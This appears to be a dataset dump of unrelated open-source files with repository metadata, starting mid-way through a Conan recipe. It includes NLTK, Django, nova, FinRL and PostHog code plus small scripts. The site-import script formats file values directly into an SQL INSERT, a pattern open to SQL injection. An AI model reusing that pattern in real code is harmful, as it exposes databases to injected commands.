self.info.header_only()
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def build(self):
tools.replace_in_file(
os.path.join(self._source_subfolder, "tiny_dnn", "util", "image.h"),
"third_party/", "",
)
def package(self):
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
cmake = CMake(self)
cmake.definitions["USE_TBB"] = self.options.with_tbb
cmake.definitions["USE_GEMMLOWP"] = False
cmake.configure()
cmake.install()
tools.rmdir(os.path.join(self.package_folder, "share"))
def package_info(self):
self.cpp_info.set_property("cmake_file_name", "tinydnn")
self.cpp_info.set_property("cmake_target_name", "TinyDNN::tiny_dnn")
# TODO: back to global scope in conan v2 once cmake_find_package* generators removed
if self.settings.os in ["Linux", "FreeBSD"]:
self.cpp_info.components["tinydnn"].system_libs = ["pthread"]
if self.options.with_tbb:
self.cpp_info.components["tinydnn"].defines = ["CNN_USE_TBB=1"]
# TODO: to remove in conan v2 once cmake_find_package* generators removed
self.cpp_info.filenames["cmake_find_package"] = "tinydnn"
self.cpp_info.filenames["cmake_find_package_multi"] = "tinydnn"
self.cpp_info.names["cmake_find_package"] = "TinyDNN"
self.cpp_info.names["cmake_find_package_multi"] = "TinyDNN"
self.cpp_info.components["tinydnn"].names["cmake_find_package"] = "tiny_dnn"
self.cpp_info.components["tinydnn"].names["cmake_find_package_multi"] = "tiny_dnn"
self.cpp_info.components["tinydnn"].set_property("cmake_target_name", "TinyDNN::tiny_dnn")
self.cpp_info.components["tinydnn"].requires = ["cereal::cereal", "stb::stb"]
if self.options.with_tbb:
self.cpp_info.components["tinydnn"].requires.append("onetbb::onetbb")
| 38.092593 | 103 | 0.637822 |
9807dcd10cee7f9786fb216b617cc5317ba4897a | 553 | py | Python | day5_nltk/stemming.py | AloyASen/Machine-learning-tutorial | 554dbd4007dd5213bb2683be2cc6a01cbc353999 | [
"MIT"
] | null | null | null | day5_nltk/stemming.py | AloyASen/Machine-learning-tutorial | 554dbd4007dd5213bb2683be2cc6a01cbc353999 | [
"MIT"
] | null | null | null | day5_nltk/stemming.py | AloyASen/Machine-learning-tutorial | 554dbd4007dd5213bb2683be2cc6a01cbc353999 | [
"MIT"
] | null | null | null | #finding the word root may help to find its meanings
from nltk.stem import PorterStemmer
from nltk.tokenize import sent_tokenize, word_tokenize
ps = PorterStemmer()
# examples
#case 1 -- only words
example_words = ["python","pythoner","pythoning","pythoned","pythonly"]
for w in example_words:
print(ps.stem(w))
#case 2 -- for sentences
new_text = "It is important to by very pythonly while you are pythoning with python. All pythoners have pythoned poorly at least once."
words = word_tokenize(new_text)
for w in words:
print(ps.stem(w))
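# For reference (a rough expectation, not asserted here): the Porter stemmer maps
# "pythoner", "pythoning" and "pythoned" to the common stem "python", and the
# tokens of the sentence above are reduced the same way (e.g. "pythonly" -> "pythonli").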
| 26.333333 | 135 | 0.750452 |
8c0fe10d137bd8bc25e69309256501485e224bf3 | 804 | py | Python | webapi/standalone_server.py | gonzalorodrigo/SoPaper | 0246c1baeb3a863cb6415ab769f363eb86267bd6 | [
"CC-BY-4.0"
] | 158 | 2015-02-07T13:19:38.000Z | 2022-03-02T15:29:22.000Z | webapi/standalone_server.py | gonzalorodrigo/SoPaper | 0246c1baeb3a863cb6415ab769f363eb86267bd6 | [
"CC-BY-4.0"
] | 8 | 2015-06-15T04:06:30.000Z | 2020-01-25T14:04:02.000Z | webapi/standalone_server.py | gonzalorodrigo/SoPaper | 0246c1baeb3a863cb6415ab769f363eb86267bd6 | [
"CC-BY-4.0"
] | 39 | 2016-01-01T07:14:32.000Z | 2021-04-26T08:25:02.000Z | #!./manage/exec-in-virtualenv.sh
# -*- coding: utf-8 -*-
# $File: standalone_server.py
# $Author: jiakai <jia.kai66@gmail.com>
from webapi import get_app
import signal
import sys
import os
import os.path
def sigint_handler(s, f):
"""receive the SIGINT signal from unittest script
and exit correctly"""
print('api standalone server: SIGINT received, exit')
sys.exit()
def main():
signal.signal(signal.SIGINT, sigint_handler)
app = get_app()
try:
app.config.from_pyfile('../manage/api_website_config.py')
except IOError as e:
print e
print 'WARNING: No configuration found, using builtin defaults.'
app.run(app.config['API_HOST'], app.config['API_PORT'],
**app.config['API_RUN_OPTIONS'])
if __name__ == "__main__":
main()
| 22.971429 | 72 | 0.66791 |
89a4be4179240d1849ffa6797328faacea1f97d4 | 3,089 | py | Python | devilry/devilry_qualifiesforexam/tests/test_models.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_qualifiesforexam/tests/test_models.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_qualifiesforexam/tests/test_models.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z | # 3rd party imports
from model_bakery import baker
# Django imports
from django import test
from django.core.exceptions import ValidationError
# Devilry imports
from devilry.devilry_qualifiesforexam import models as status_models
class TestStatus(test.TestCase):
def test_notready_no_message(self):
test_status = baker.make('devilry_qualifiesforexam.Status', status=status_models.Status.NOTREADY)
with self.assertRaisesMessage(ValidationError, 'Message can not be empty when status is ``notready``.'):
test_status.full_clean()
def test_ready_no_message_and_no_plugin(self):
test_status = baker.make('devilry_qualifiesforexam.Status', status=status_models.Status.READY)
with self.assertRaisesMessage(ValidationError, 'A ``message`` is required when no ``plugin`` is specified. '
'The message should explain why a plugin is not used.'):
test_status.full_clean()
def test_notready_no_plugin(self):
test_status = baker.make('devilry_qualifiesforexam.Status', status=status_models.Status.NOTREADY,
message='No plugin', plugin='some.plugin')
with self.assertRaisesMessage(ValidationError, '``plugin`` is not allowed when status is ``notready``.'):
test_status.full_clean()
def test_get_current_status_no_status_for_period(self):
testperiod = baker.make_recipe('devilry.apps.core.period_active')
last_status = status_models.Status.objects.get_last_status_in_period(period=testperiod)
self.assertIsNone(last_status)
def test_get_current_status(self):
testperiod = baker.make_recipe('devilry.apps.core.period_active')
baker.make('devilry_qualifiesforexam.Status',
period=testperiod,
status=status_models.Status.READY,
plugin='plugin')
last_status = baker.make('devilry_qualifiesforexam.Status',
period=testperiod,
status=status_models.Status.READY,
plugin='plugin')
current_status = status_models.Status.objects.get_last_status_in_period(period=testperiod)
self.assertEqual(current_status, last_status)
def test_get_qualified_students(self):
testperiod = baker.make_recipe('devilry.apps.core.period_active')
teststatus = baker.make('devilry_qualifiesforexam.Status',
period=testperiod,
status=status_models.Status.READY,
plugin='plugin')
baker.make('devilry_qualifiesforexam.QualifiesForFinalExam',
status=teststatus,
qualifies=True,
_quantity=10)
baker.make('devilry_qualifiesforexam.QualifiesForFinalExam',
status=teststatus,
qualifies=False,
_quantity=10)
self.assertEqual(10, len(teststatus.get_qualified_students()))
| 48.265625 | 116 | 0.650372 |
d08944cf744fc23743ec9db0176bf1b5e34223cc | 1,333 | py | Python | .history/run_update_20220325105025.py | miguel-fresh/geoip-translation | ccf9dbc0330e597704e57d8b2967fc9be16017ed | [
"Info-ZIP"
] | null | null | null | .history/run_update_20220325105025.py | miguel-fresh/geoip-translation | ccf9dbc0330e597704e57d8b2967fc9be16017ed | [
"Info-ZIP"
] | null | null | null | .history/run_update_20220325105025.py | miguel-fresh/geoip-translation | ccf9dbc0330e597704e57d8b2967fc9be16017ed | [
"Info-ZIP"
] | null | null | null | import subprocess
from sys import stderr, stdout
from pathlib import Path
from os import rename, getcwd, path
START_DOWNLOAD = False
START_CONVERT = True
CURRENT_DIR = Path(getcwd())
ZIP_NAME = 'GeoLite2-City-CSV.zip'
# Relative (to current dir) paths to the download and output directories
DOWNLOAD_DIRNAME = './data'
OUTPUT_DIRNAME = './output'
DOWNLOAD_ABSPATH = CURRENT_DIR.joinpath(DOWNLOAD_DIRNAME)
OUTPUT_ABSPATH = CURRENT_DIR.joinpath(OUTPUT_DIRNAME)
if START_DOWNLOAD:
# Download .zip
download_output = subprocess.run(['composer', 'update', 'tronovav/geoip2-update'],
capture_output=True,
shell=True,
cwd='./geoip2-update')
print(download_output)
# TODO: Rename .zip to GeoLite2-City-CSV.zip
# Convert format
if START_CONVERT:
# python geolite2legacy.py -i GeoLite2-City-CSV.zip -o GeoLiteCity.dat -f geoname2fips.csv
downloaded_zip_asbpath = CURRENT_DIR.joinpath(ZIP_NAME)
update_output = subprocess.run(['python', 'geolite2legacy.py',
'-i', downloaded_zip_asbpath,
'-o', OUTPUT_ABSPATH,
'-f', 'geoname2fips.csv'],
cwd='./geolite2legacy')
print(update_output)
| 30.295455 | 94 | 0.606152 |
a969f5c642f00dbee7ccad96ee61cba6a4d60233 | 1,938 | py | Python | 1SiteRanking/Data Collection/create_site_table.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 3 | 2021-07-15T15:58:52.000Z | 2021-07-16T13:22:47.000Z | 1SiteRanking/Data Collection/create_site_table.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | null | null | null | 1SiteRanking/Data Collection/create_site_table.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 4 | 2017-08-04T12:41:06.000Z | 2019-01-31T14:55:10.000Z | # coding:utf-8
# version:python3.5.1
# author:kyh
# import geodata csv files to cloud database
import psycopg2
class CloudDatabase(object):
# Init database and input ip
# 初始化数据库并传入ip
def __init__(self, database, user, password, ip="127.0.0.1", port="5432"):
self.database = database
self.user = user
self.password = password
self.ip = ip
self.port = port
    # Connect to the database on the given host and keep the connection and cursor
def db_connect(self):
self.connection = psycopg2.connect(database=self.database, user=self.user,
password=self.password, host=self.ip, port=self.port)
self.cursor = self.connection.cursor()
    # Write the error to a log file
def write_log(self, e):
self.connection.rollback()
with open("log.txt", 'a') as log_file:
log_file.writelines(str(e))
    # Import site records from the text file into the database
def import_site(self, filepath):
with open(filepath,'r') as file:
for site in file.readlines():
id = site.split('\t')[0]
name = site.split('\t')[1]
lat = site.split('\t')[2]
lon = site.split('\t')[3].split('\n')[0]
try:
sql_command="INSERT INTO site VALUES ({0},'{1}',{2},{3});".format(id,name,lat,lon)
self.cursor.execute(sql_command)
self.connection.commit()
except Exception as e:
self.write_log(e)
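    # A sketch of the expected input format (inferred from the split('\t') calls
    # above): one site per line, tab-separated as id<TAB>name<TAB>lat<TAB>lon.
    # The values below are illustrative only, not real data:
    #
    #   1\tSiteA\t39.90\t116.40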
if __name__ == '__main__':
try:
        # Connect to the local database
database = CloudDatabase("EmotionMap3", "postgres", "postgres", "127.0.0.1")
database.db_connect()
database.import_site(r'site_info.txt')
except Exception as e:
with open("log.txt", 'a') as log_file:
log_file.writelines(str(e)) | 33.413793 | 102 | 0.567079 |
73393ef24973b90f829aa6cd5b5b08e08245e81d | 2,200 | py | Python | setup.py | puneeth714/FinRL | ec71c84342f7b78cf91d5c32e16e5fc88f24bc56 | [
"MIT"
] | 1,949 | 2020-09-23T03:02:10.000Z | 2021-04-12T18:43:35.000Z | setup.py | puneeth714/FinRL | ec71c84342f7b78cf91d5c32e16e5fc88f24bc56 | [
"MIT"
] | 154 | 2020-09-23T03:05:09.000Z | 2021-04-11T23:57:16.000Z | setup.py | puneeth714/FinRL | ec71c84342f7b78cf91d5c32e16e5fc88f24bc56 | [
"MIT"
] | 478 | 2020-10-14T19:01:14.000Z | 2021-04-12T17:36:02.000Z | from setuptools import setup, find_packages
# Read requirements.txt, ignore comments
try:
REQUIRES = list()
f = open("requirements.txt", "rb")
for line in f.read().decode("utf-8").split("\n"):
line = line.strip()
if "#" in line:
line = line[: line.find("#")].strip()
if line:
REQUIRES.append(line)
except:
print("'requirements.txt' not found!")
REQUIRES = list()
setup(
name="finrl",
version="0.3.3",
include_package_data=True,
author="Hongyang Yang, Xiaoyang Liu",
author_email="hy2500@columbia.edu",
url="https://github.com/finrl/finrl-library",
license="MIT",
packages=find_packages(),
install_requires=REQUIRES
+ ["pyfolio @ git+https://github.com/quantopian/pyfolio.git#egg=pyfolio-0.9.2"]
+ ["elegantrl @ git+https://github.com/AI4Finance-Foundation/ElegantRL.git#egg=elegantrl"],
# dependency_links=['git+https://github.com/quantopian/pyfolio.git#egg=pyfolio-0.9.2'],
#install_requires=REQUIRES,
description="FinRL library, a Deep Reinforcement Learning library designed specifically for automated stock trading.",
long_description="""finrl is a Python library for that facilitates beginners to expose themselves to quantitative finance
and to develop their own trading strategies, it is developed by `AI4Finance`_.
FinRL has been developed under three primary principles: completeness, hands-on tutorial and reproducibility.
.. _AI4Finance: https://github.com/AI4Finance-Foundation
""",
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
],
keywords="Reinforcment Learning",
platform=["any"],
python_requires=">=3.6",
)
| 40 | 126 | 0.66 |
35f451087d4aec96abfe5a339b4bcd07dc759587 | 3,539 | py | Python | nova/tests/unit/policies/test_extensions.py | zjzh/nova | 7bb21723171c59b93e28f5d508c2b6df39220f13 | [
"Apache-2.0"
] | 1,874 | 2015-01-04T05:18:34.000Z | 2022-03-31T03:30:28.000Z | nova/tests/unit/policies/test_extensions.py | zjzh/nova | 7bb21723171c59b93e28f5d508c2b6df39220f13 | [
"Apache-2.0"
] | 40 | 2015-04-13T02:32:42.000Z | 2022-02-16T02:28:06.000Z | nova/tests/unit/policies/test_extensions.py | zjzh/nova | 7bb21723171c59b93e28f5d508c2b6df39220f13 | [
"Apache-2.0"
] | 1,996 | 2015-01-04T15:11:51.000Z | 2022-03-31T11:03:13.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack.compute import extension_info
from nova.policies import extensions as policies
from nova.tests.unit.api.openstack import fakes
from nova.tests.unit.policies import base
class ExtensionsPolicyTest(base.BasePolicyTest):
"""Test Extensions APIs policies with all possible context.
This class defines the set of context with different roles
which are allowed and not allowed to pass the policy checks.
With those set of context, it will call the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(ExtensionsPolicyTest, self).setUp()
self.controller = extension_info.ExtensionInfoController()
self.req = fakes.HTTPRequest.blank('')
# Check that everyone is able to get extension info.
self.everyone_authorized_contexts = [
self.legacy_admin_context, self.system_admin_context,
self.project_admin_context, self.project_member_context,
self.project_reader_context, self.project_foo_context,
self.other_project_reader_context,
self.system_member_context, self.system_reader_context,
self.system_foo_context,
self.other_project_member_context
]
self.everyone_unauthorized_contexts = []
def test_list_extensions_policy(self):
rule_name = policies.BASE_POLICY_NAME
self.common_policy_check(self.everyone_authorized_contexts,
self.everyone_unauthorized_contexts,
rule_name,
self.controller.index,
self.req)
def test_show_extensions_policy(self):
rule_name = policies.BASE_POLICY_NAME
self.common_policy_check(self.everyone_authorized_contexts,
self.everyone_unauthorized_contexts,
rule_name,
self.controller.show,
self.req, 'os-volumes')
class ExtensionsScopeTypePolicyTest(ExtensionsPolicyTest):
"""Test Extensions APIs policies with system scope enabled.
This class set the nova.conf [oslo_policy] enforce_scope to True
so that we can switch on the scope checking on oslo policy side.
It defines the set of context with scoped token
which are allowed and not allowed to pass the policy checks.
With those set of context, it will run the API operation and
verify the expected behaviour.
"""
def setUp(self):
super(ExtensionsScopeTypePolicyTest, self).setUp()
self.flags(enforce_scope=True, group="oslo_policy")
class ExtensionsNoLegacyPolicyTest(ExtensionsScopeTypePolicyTest):
"""Test Extensions APIs policies with system scope enabled,
and no more deprecated rules that allow the legacy admin API to
access system_admin_or_owner APIs.
"""
without_deprecated_rules = True
| 43.158537 | 78 | 0.68833 |
ca44b6c6d3d1297d667b1609df228e074eba3d4d | 3,694 | py | Python | days/day006/cheapest_path.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 2 | 2018-10-28T17:12:37.000Z | 2018-10-28T17:12:39.000Z | days/day006/cheapest_path.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | 3 | 2018-10-28T17:11:04.000Z | 2018-10-29T22:36:36.000Z | days/day006/cheapest_path.py | alex-vegan/100daysofcode-with-python-course | b6c12316abe18274b7963371b8f0ed2fd549ef07 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 30 17:43:45 2018
100DaysOfCode --- TalkPython --- Pybites
4-6days --- collections module
@author: Alexey Sidorov
"""
from collections import deque
# this graph maps each city to its adjacent cities and the cost of each flight
bonds = {'Yekaterinburg': {'Kiev':101, 'St Peterburg':85, 'Moscow':65, 'Georgia':100},
'Kiev': {'Yekaterinburg':101, 'Berlin':60, 'Vienna':50, 'Sofia':50, 'Georgia':70},
'Rome': {'Paris':50, 'Madrid':60, 'Berlin':55, 'Sofia':40},
'Paris': {'Madrid':50, 'London':15, 'Berlin':40, 'Rome':50},
'Berlin': {'Paris':40, 'Rome':55, 'Vienna':25, 'Kiev':60, 'Moscow':80},
'London': {'Paris':15, 'Oslo':55},
'Oslo': {'London':55, 'Helsinki':40},
'Helsinki': {'Oslo':40, 'Moscow':45, 'St Peterburg':15},
'St Peterburg': {'Helsinki':15, 'Moscow':30, 'Yekaterinburg':85},
'Moscow': {'Yekaterinburg':65, 'St Peterburg':30, 'Helsinki':45, 'Georgia':80, 'Berlin':80, 'Vienna':85},
'Vienna': {'Madrid':80, 'Berlin':25, 'Sofia':40, 'Kiev':50, 'Moscow':85},
'Sofia': {'Rome':40, 'Vienna':40, 'Kiev':50, 'Istanbul':25},
'Istanbul': {'Sofia':25, 'Georgia':60},
'Georgia': {'Istanbul':60, 'Kiev':70, 'Moscow':80, 'Yekaterinburg':100},
'Madrid': {'Paris':50, 'Vienna':80, 'Rome':60}}
START_CITY = 'Yekaterinburg'
FINISH_CITY = 'Madrid'
def dijkstra(bond_grapth, start_city=START_CITY):
que_que = deque() # queue type from collection module
cheapest_paths = {} # shortest path dict
cheapest_paths[start_city] = 0
que_que.append(start_city)
while que_que:
        v = que_que.popleft()  # take the next vertex from the queue
for u in bond_grapth[v]: # neighbours of city
if (u not in cheapest_paths or cheapest_paths[v] + bond_grapth[v][u] < cheapest_paths[u]):
cheapest_paths[u] = cheapest_paths[v] + bond_grapth[v][u]
que_que.append(u)
return cheapest_paths
def reveal_cheapest_path(bond_grapth, cheapest_paths, finish_city=FINISH_CITY):
cheapest_path = [finish_city]
    v = finish_city  # walk backwards from the destination vertex
while cheapest_paths[v] != 0:
for u in bond_grapth[v]: # neighbours of current city
if cheapest_paths[v] - bond_grapth[v][u] == cheapest_paths[u]:
cheapest_path.append(u)
break
v = u
return cheapest_path
def main():
'''
    this function computes the cheapest flight cost between cities
    1) first, input the start city from the list:
    Yekaterinburg, Kiev, Rome, Paris, Berlin, London, Oslo, Helsinki,
    St Peterburg, Moscow, Vienna, Sofia, Istanbul, Georgia, Madrid
    !!! be sure that the city name starts with a capital letter !!!
    2) second, input the destination city from the same list
    3) receive the path and its cost
'''
start = input("From what city to start? ")
while start not in bonds:
start = input("That city isn't possible for flight. " +
"From what city to start? ")
cheapest_paths = dijkstra(bonds, start)
finish = input("To what city to build the path? ")
while finish not in bonds:
finish = input("That city isn't possible for flight. " +
"To what city to build the path? ")
cheapest_path = reveal_cheapest_path(bonds, cheapest_paths, finish)
print('\ncheapest path is {}\ncheapest path cost'
' = {}$'.format(str(cheapest_path[::-1]), str(cheapest_paths[finish])))
return None
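def example_route(start_city=START_CITY, finish_city=FINISH_CITY):
    '''
    A minimal non-interactive sketch (added for illustration, not part of the
    original flow): it reuses dijkstra() and reveal_cheapest_path() from above
    and the module-level bonds graph; the default cities come from
    START_CITY/FINISH_CITY.
    '''
    costs = dijkstra(bonds, start_city)
    route = reveal_cheapest_path(bonds, costs, finish_city)
    # route is built from destination back to start, so reverse it for display
    return route[::-1], costs[finish_city]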
if __name__ == "__main__":
main()
| 41.044444 | 115 | 0.59556 |
a7828252fefa8092c89f3c9d130fab711fdfe972 | 1,606 | py | Python | doit_doc_template/templates/base/library/cmd_skip.py | i386x/abcdoc | 04246ce33a480ce3039832db80d0f5c86a86ff54 | [
"MIT"
] | null | null | null | doit_doc_template/templates/base/library/cmd_skip.py | i386x/abcdoc | 04246ce33a480ce3039832db80d0f5c86a86ff54 | [
"MIT"
] | null | null | null | doit_doc_template/templates/base/library/cmd_skip.py | i386x/abcdoc | 04246ce33a480ce3039832db80d0f5c86a86ff54 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#! \file ~/doit_doc_template/templates/base/library/cmd_skip.py
#! \author Jiří Kučera, <sanczes AT gmail.com>
#! \stamp 2019-07-20 11:55:57 +0200
#! \project DoIt! Doc: Sphinx Extension for DoIt! Documentation
#! \license MIT
#! \version See doit_doc_template.__version__
#! \brief See __doc__
#
"""\
skip command.\
"""
__license__ = """\
Copyright (c) 2014 - 2019 Jiří Kučera.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
IN THE SOFTWARE.\
"""
from docutils.nodes import SkipNode
def cmd_skip(action, context):
"""
"""
raise SkipNode
#-def
| 39.170732 | 79 | 0.732254 |
474259ec861e6553b3f07a33fbbb3b5647d62ae0 | 9,243 | py | Python | posthog/celery.py | atbe/posthog | c98b4eb7da13a269f3ff885a22dd471fc70162ca | [
"MIT"
] | null | null | null | posthog/celery.py | atbe/posthog | c98b4eb7da13a269f3ff885a22dd471fc70162ca | [
"MIT"
] | null | null | null | posthog/celery.py | atbe/posthog | c98b4eb7da13a269f3ff885a22dd471fc70162ca | [
"MIT"
] | null | null | null | import os
import time
import statsd
from celery import Celery
from celery.schedules import crontab
from django.conf import settings
from django.db import connection
from django.utils import timezone
from posthog.ee import is_ee_enabled
from posthog.redis import get_client
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "posthog.settings")
app = Celery("posthog")
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
app.config_from_object("django.conf:settings", namespace="CELERY")
# Load task modules from all registered Django app configs.
app.autodiscover_tasks()
# Make sure Redis doesn't add too many connections
# https://stackoverflow.com/questions/47106592/redis-connections-not-being-released-after-celery-task-is-complete
app.conf.broker_pool_limit = 0
# How frequently do we want to calculate action -> event relationships if async is enabled
ACTION_EVENT_MAPPING_INTERVAL_SECONDS = settings.ACTION_EVENT_MAPPING_INTERVAL_SECONDS
# How frequently do we want to calculate event property stats if async is enabled
EVENT_PROPERTY_USAGE_INTERVAL_SECONDS = settings.EVENT_PROPERTY_USAGE_INTERVAL_SECONDS
# How frequently do we want to check if dashboard items need to be recalculated
UPDATE_CACHED_DASHBOARD_ITEMS_INTERVAL_SECONDS = settings.UPDATE_CACHED_DASHBOARD_ITEMS_INTERVAL_SECONDS
if settings.STATSD_HOST is not None:
statsd.Connection.set_defaults(host=settings.STATSD_HOST, port=settings.STATSD_PORT)
@app.on_after_configure.connect
def setup_periodic_tasks(sender, **kwargs):
if not settings.DEBUG:
sender.add_periodic_task(1.0, redis_celery_queue_depth.s(), name="1 sec queue probe", priority=0)
# Heartbeat every 10sec to make sure the worker is alive
sender.add_periodic_task(10.0, redis_heartbeat.s(), name="10 sec heartbeat", priority=0)
# update events table partitions twice a week
sender.add_periodic_task(
crontab(day_of_week="mon,fri", hour=0, minute=0), update_event_partitions.s(), # check twice a week
)
if getattr(settings, "MULTI_TENANCY", False) and not is_ee_enabled():
sender.add_periodic_task(crontab(minute=0, hour="*/12"), run_session_recording_retention.s())
# send weekly status report on non-PostHog Cloud instances
if not getattr(settings, "MULTI_TENANCY", False):
sender.add_periodic_task(crontab(day_of_week="mon", hour=0, minute=0), status_report.s())
# Cloud (posthog-cloud) cron jobs
if getattr(settings, "MULTI_TENANCY", False):
sender.add_periodic_task(crontab(hour=0, minute=0), calculate_billing_daily_usage.s()) # every day midnight UTC
# send weekly email report (~ 8:00 SF / 16:00 UK / 17:00 EU)
sender.add_periodic_task(crontab(day_of_week="mon", hour=15, minute=0), send_weekly_email_report.s())
sender.add_periodic_task(crontab(day_of_week="fri", hour=0, minute=0), clean_stale_partials.s())
sender.add_periodic_task(
UPDATE_CACHED_DASHBOARD_ITEMS_INTERVAL_SECONDS, check_cached_items.s(), name="check dashboard items"
)
if is_ee_enabled():
sender.add_periodic_task(120, clickhouse_lag.s(), name="clickhouse table lag")
sender.add_periodic_task(120, clickhouse_row_count.s(), name="clickhouse events table row count")
sender.add_periodic_task(120, clickhouse_part_count.s(), name="clickhouse table parts count")
sender.add_periodic_task(120, calculate_cohort.s(), name="recalculate cohorts")
if settings.ASYNC_EVENT_ACTION_MAPPING:
sender.add_periodic_task(
ACTION_EVENT_MAPPING_INTERVAL_SECONDS,
calculate_event_action_mappings.s(),
name="calculate event action mappings",
expires=ACTION_EVENT_MAPPING_INTERVAL_SECONDS,
)
if settings.ASYNC_EVENT_PROPERTY_USAGE:
sender.add_periodic_task(
EVENT_PROPERTY_USAGE_INTERVAL_SECONDS,
calculate_event_property_usage.s(),
name="calculate event property usage",
)
@app.task(ignore_result=True)
def redis_heartbeat():
get_client().set("POSTHOG_HEARTBEAT", int(time.time()))
CLICKHOUSE_TABLES = [
"events",
"sharded_events",
"person",
"sharded_person",
"person_distinct_id",
"sharded_person_distinct_id",
"session_recording_events",
"sharded_session_recording_events",
]
@app.task(ignore_result=True)
def clickhouse_lag():
if is_ee_enabled() and settings.EE_AVAILABLE:
from ee.clickhouse.client import sync_execute
for table in CLICKHOUSE_TABLES:
try:
QUERY = (
"""select max(_timestamp) observed_ts, now() now_ts, now() - max(_timestamp) as lag from {table};"""
)
query = QUERY.format(table=table)
lag = sync_execute(query)[0][2]
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
g.send("clickhouse_{table}_table_lag_seconds".format(table=table), lag)
except:
pass
else:
pass
@app.task(ignore_result=True)
def clickhouse_row_count():
if is_ee_enabled() and settings.EE_AVAILABLE:
from ee.clickhouse.client import sync_execute
for table in CLICKHOUSE_TABLES:
try:
QUERY = """select count(1) freq from {table};"""
query = QUERY.format(table=table)
rows = sync_execute(query)[0][0]
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
g.send("clickhouse_{table}_table_row_count".format(table=table), rows)
except:
pass
else:
pass
@app.task(ignore_result=True)
def clickhouse_part_count():
if is_ee_enabled() and settings.EE_AVAILABLE:
from ee.clickhouse.client import sync_execute
QUERY = """
select table, count(1) freq
from system.parts
group by table
order by freq desc;
"""
rows = sync_execute(QUERY)
for (table, parts) in rows:
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
g.send("clickhouse_{table}_table_parts_count".format(table=table), parts)
else:
pass
@app.task(ignore_result=True)
def redis_celery_queue_depth():
try:
g = statsd.Gauge("%s_posthog_celery" % (settings.STATSD_PREFIX,))
llen = get_client().llen("celery")
g.send("queue_depth", llen)
except:
# if we can't connect to statsd don't complain about it.
# not every installation will have statsd available
return
@app.task(ignore_result=True)
def update_event_partitions():
with connection.cursor() as cursor:
cursor.execute(
"DO $$ BEGIN IF (SELECT exists(select * from pg_proc where proname = 'update_partitions')) THEN PERFORM update_partitions(); END IF; END $$"
)
@app.task(ignore_result=True)
def clean_stale_partials():
"""Clean stale (meaning older than 7 days) partial social auth sessions."""
from social_django.models import Partial
Partial.objects.filter(timestamp__lt=timezone.now() - timezone.timedelta(7)).delete()
@app.task(ignore_result=True)
def status_report():
from posthog.tasks.status_report import status_report
status_report()
@app.task(ignore_result=True)
def run_session_recording_retention():
from posthog.tasks.session_recording_retention import session_recording_retention_scheduler
session_recording_retention_scheduler()
@app.task(ignore_result=True)
def calculate_event_action_mappings():
from posthog.tasks.calculate_action import calculate_actions_from_last_calculation
calculate_actions_from_last_calculation()
@app.task(ignore_result=True)
def calculate_cohort():
from posthog.tasks.calculate_cohort import calculate_cohorts
calculate_cohorts()
@app.task(ignore_result=True)
def check_cached_items():
from posthog.tasks.update_cache import update_cached_items
update_cached_items()
